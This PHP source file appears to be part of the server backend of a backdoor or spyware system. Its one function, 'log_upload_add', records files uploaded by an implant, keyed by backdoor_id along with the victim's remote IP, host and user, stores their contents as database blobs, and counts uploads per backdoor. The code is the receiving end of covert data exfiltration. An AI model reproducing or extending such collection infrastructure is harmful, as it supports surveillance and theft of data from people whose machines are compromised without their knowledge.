<?php

//////////
///
///   log_upload.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

$dm['log_upload.add'] = array('func'   => 'log_upload_add',
                              'perm'   => AL_SERV,
                              'escape' => false);



/***************\
*   FUNCTIONS   *
\***************/

function log_upload_add($backdoor_id, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= desc
   // varchar2  <= -
   // varchar3  <= -
   // varchar4  <= -
   // int1      <= [sizeof(content(contentfile))]
   // int2      <= -
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= [content(contentfile)]

   if(!is_success(($ret = db_escape($backdoor_id)))) return $ret;
   if(!is_success(($ret = db_escape($remoteip)))) return $ret;
   if(!is_success(($ret = db_escape($remotehost)))) return $ret;
   if(!is_success(($ret = db_escape($remoteuser)))) return $ret;

   $sql  = "INSERT INTO `log` (`backdoor_id`, ";
   $sql .=                    "`type`, ";
   $sql .=                    "`flags`, ";
   $sql .=                    "`remoteip`, ";
   $sql .=                    "`remotehost`, ";
   $sql .=                    "`remoteuser`, ";
   $sql .=                    "`received`, ";
   $sql .=                    "`acquired`, ";
   $sql .=                    "`varchar1`, ";
   $sql .=                    "`int1`, ";
   $sql .=                    "`longblob1`) ";
   $sql .= "VALUES ('$backdoor_id', 'UPLOAD', ?, '$remoteip', '$remotehost', '$remoteuser', UTC_TIMESTAMP(), ?, ?, ?, ?)";

   $ret = db_prepare($sql);

   if(!is_success($ret)) {
      return $ret;
   }

   $stmt = $ret['payload'];

   foreach($logarray as $log) {
      clearstatcache();

      if(!(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']]))) {
         return error('session', 'nosuchupload');
      }

      $params = array(array('t' => 'i', 'v' => $log['flags']),
                      array('t' => 's', 'v' => str_replace(':', '', $log['acquired']->scalar)),
                      array('t' => 's', 'v' => $log['desc']),
                      array('t' => 'i', 'v' => filesize(sys_get_temp_dir().'/'.$log['contentfile'])),
                      array('t' => 'b', 'v' => sys_get_temp_dir().'/'.$log['contentfile']));

      $ret = db_execute($stmt, $params);

      unlink(sys_get_temp_dir().'/'.$log['contentfile']);
      unset($_SESSION['upload'][$log['contentfile']]);

      if(!is_success($ret)) {
         return $ret;
      }

      $sql  = "UPDATE `stat` ";
      $sql .= "SET `upload` = `upload` + 1, ";
      $sql .=     "`upload_new` = `upload_new` + 1 ";
      $sql .= "WHERE `backdoor_id` = '$backdoor_id'";

      $ret = db_query($sql);

      if(!is_success($ret)) {
         return $ret;
      }
   }

   return success(true);
}

?>
